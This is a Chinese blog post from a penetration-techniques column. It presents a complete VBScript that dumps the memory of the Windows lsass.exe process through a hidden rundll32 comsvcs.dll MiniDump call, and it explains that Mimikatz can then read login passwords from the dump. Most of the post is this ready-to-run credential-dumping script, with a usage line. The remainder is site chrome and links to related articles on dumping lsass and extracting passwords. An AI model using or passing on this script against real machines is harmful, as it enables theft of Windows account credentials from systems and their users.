从dump文件中读取开机密码

最新推荐文章于 2024-05-23 23:39:55 发布
最新推荐文章于 2024-05-23 23:39:55 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 渗透技巧 文章标签: lsass.exe dump mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/100178291
版权

通过vbs脚本创建lsass.exe进程dump文件,使用Mimikatz从dump文件中读取电脑密码!
在这里插入图片描述
使用方法:cscript.exe test.vbs lsass.exe
脚本代码:

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
    WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
    WScript.StdOut.WriteLine("Usage: procdump <process>")
    WScript.Quit
Else
    Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
    
    ' get process id or name
    pid = WScript.Arguments(0)
    
    ' connect with debug privilege
    Set fso  = CreateObject("Scripting.FileSystemObject")
    Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
    
    ' if not a number
    If(Not IsNumeric(pid)) Then
      query = "Name"
    Else
      query = "ProcessId"
    End If
    
    ' try find it
    Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
      query & " = '" & pid & "'")
    
    If (list.Count = 0) Then
      WScript.StdOut.WriteLine("Can't find active process : " & pid)
      WScript.Quit()
    End If

    For Each proc in list
      pid = proc.ProcessId
      str = proc.Name
      Exit For
    Next

    dmp = fso.GetBaseName(str) & ".bin"
    
    ' if dump file already exists, try to remove it
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Removing " & dmp)
      fso.DeleteFile(dmp)
    End If
    
    WScript.StdOut.WriteLine("Attempting to dump memory from " & _
      str & ":" & pid & " to " & dmp)
    
    Set proc       = svc.Get("Win32_Process")
    Set startup    = svc.Get("Win32_ProcessStartup")
    Set cfg        = startup.SpawnInstance_
    cfg.ShowWindow = SW_HIDE

    cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
          pid & " " & fso.GetAbsolutePathName(".") & "\" & _
          dmp & " full"
    
    Call proc.Create (cmd, null, cfg, pid)
    
    ' sleep for a second
    Wscript.Sleep(1000)
    
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Memory saved to " & dmp)
    Else
      WScript.StdOut.WriteLine("Something went wrong.")
    End If
End If

参考链接:https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll

FFE4
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Procdump密码读取.zip
04-16
用于本地密码内存读取,使用方法包含着压缩包
如何在JAVA dump文件/内存镜像查找变量的值
jioulongzi的专栏
03-17 540
很多时候,当程序OOM或者其他异常情况时,我们需要搞清楚当时应用内部数据情况,所有某些时候我们需要查看当时内存镜像某些成员变量的值。比如查看当时内存实例数据库账号,密码是否正确等等。直接进入正题,我们首先搭建一个测试使用的springboot项目,除了基本模板代码外,剩余代码如下:我们预期目标为通过镜像实例去查看bbb项目搭建成功后,启运行项目,接着使用命令导出运行的应用的内存镜像接下来使用分析工具,这里使用:MemoryAnalyzer, 大家没有可以自行去下载。
Hidedumpdumplsass加密免杀工具
最新发布
记录学习,一起进步
05-23 1162
dumplsass
获取windows登陆账户密码
xiaojiong2000的专栏
01-18 4345
Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。 因为登陆的域名和用户名是明文存储在winlogon进程里的,而Password是限定了查找本进程用户的密码    GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); >,然后到winlogon进程的空间查找UserD
如何生成和查看dump文件
weixin_38920945的博客
07-25 3180
前言在日常开发,即使代码写得有多谨慎,免不了还是会发生各种意外的事件,比如服务器内存突然飙高,又或者发生内存溢出(OOM)。当发生这种情况时,我们怎么去排查,怎么去分析原因呢?这时就引出这篇文章要讲的dump文件,各位看官且往下看。什么是dump文件dump文件是一个进程或者系统在某一个给定的时间的快照。dump文件是用...
网管教程 从入门到精通软件篇.txt
04-25
如果不能在启动目录(默认为 %systemroot%System32)找到该文件,将试着在 Windows 安装 CD 找到它。如果有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart  创建和删除硬盘...
Linux操作系统死机处理方法
03-04
这样,当程序崩溃时,就可以通过分析core dump文件找出问题所在。 2. Diskdump:Diskdump工具是在单机上创建和采集vmcore(内核转储)的工具,无需借助网络。当内核崩溃时,系统会将内存、CPU状态等信息保存到预先...
linux mount使用
07-26
以挂载 Windows 共享为例,可以在 `/etc/fstab` 文件添加以下行来实现开机自动挂载: ```bash //192.169.0.11/share /mnt/share cifs user,username=root,password=123 0 0 ``` 以上配置: - `//192.169.0.11/...
Linux运维工程师:30道面试题整理
06-20
Linux 系统开机启动顺序是:BIOS -> 读取 MBR -> Boot Loader -> 加载内核 -> 用户层 init -> 运行 rc.syninit -> 启动内核模块 -> 执行不同级别运行的脚本程序 -> 执行 `/etc/rc.d/rc.local` -> 执行 `/bin/login...
28个运维经典面试题.pdf
10-30
6. **生成32位随机密码**:`cat /dev/urandom | head -1 | md5sum | head -c 32 >> /pass`,通过`/dev/urandom`生成随机数据,`md5sum`生成MD5摘要,截取前32位作为密码,并追加到/pass文件。 7. **Apache访问量...
dump数据读取
12-19
文件用于破解出来的dump文件查看,打开即可使用,完全免费。
hl-dump读取工具
03-17
用于读取软件加密狗的dat及reg数据,可复制软件加密狗。后续可利用*dat数据计算seed值
php拒绝使用明文mysql密码_mysqldump密码问题
weixin_30780097的博客
01-28 280
在 web 服务器上使用 mysqldump 备份 MySQL 服务器的数据如果这样:mysqldump -hxxx.xxx.xx.xx -uusername -ppwd db table --where="order_id > 4300284 and order_id < 4300293" > /xxxx/file.sql明文输入密码,会提示:Warning: A partia...
thread dump和heap dump
少年乖
03-26 1254
原文地址:https://bijian1013.iteye.com/blog/2221240 thread dump和heap dump 文章目录thread dump和heap dump一.dump基本概念二.利用JDK自带的工具获取thread dump文件和heap dump文件1.获取heap dump文件2.获取thread dump文件3.如果我们只需要将dump存活的对象导出,那么...
域渗透学习总结
m0_56171651的博客
11-28 1092
域渗透学习总结
流量分析+dmp文件获取用户名密码
qq_47804678的博客
04-06 641
dmp文件是windows系统的错误转储文件,当Windows发生错误蓝屏的时候,系统将当前RAM内存【含虚拟内存】的数据直接写到文件去,方便定位故障原因。可以看到在响应状态为200的流量,之前都是upload/config.php的路径,但最后一个是请求了一个lsass.dmp的文件,所以就是系统的错误转储文件,里面就有可能会有用户的账号密码mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限,注入进程,读取进程内存,当然他最大的亮点是。打开好多包,先筛一波http,
ic卡白卡怎么写入数据_密码课堂 | 金融IC卡发卡系统和交易系统
weixin_39946429的博客
11-24 2866
金融IC卡发卡系统和交易系统金融IC卡发卡系统和交易系统(以下简称金融IC卡系统)是现代信息技术与金融服务的高度融合,通过发行采用芯片技术与金融行业标准,可兼具银行卡、保障卡、管理卡等多重功能的金融IC卡,从根本上提高银行卡的安全性。金融IC卡系统密码应用主要解决卡片与发卡行之间的身份鉴别、持卡人的身份鉴别、交易数据的传输安全与存储安全等方面的问题。一般来说,金融IC卡发卡系统和交易系统...
java 获取系统用户名和密码_Java – 从配置文件加密/解密用户名和密码
weixin_34808718的博客
02-25 853
在内部网络上肯定不能解雇安全.内部人士对信息造成的损害最大.看看受保护的价值,并适当考虑安全.听起来好像有一个第三方应用程序,您有一套凭据,一些客户端在使用第三方应用程序时有效共享此身份.如果是这样,我建议采用以下方法.不要将第三方密码分发到Web服务器之外.最安全的方法是以交互方式将其提供给Web应用程序.这可能是ServletContextListener,它在应用程序启动时提示输入密码,或应...
matlab读取dump文件
05-22
在 MATLAB 读取 dump 文件,可以使用 `load` 函数。dump 文件是二进制文件,因此需要指定 `-mat` 选项以加载 MAT 文件格式。 以下是读取 dump 文件的示例代码: ```matlab data = load('example.dump', '-mat'); ``` 其,`example.dump` 是要读取dump 文件文件名,`-mat` 指定了文件格式为 MAT 文件格式。读取后,数据将存储在 `data` 变量。您可以根据文件存储的数据类型和格式来使用 `data` 变量。 请注意,如果 dump 文件的数据类型与您的 MATLAB 版本不兼容,则可能需要进行转换。在这种情况下,您可以使用 MATLAB 的 `typecast` 函数来进行转换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值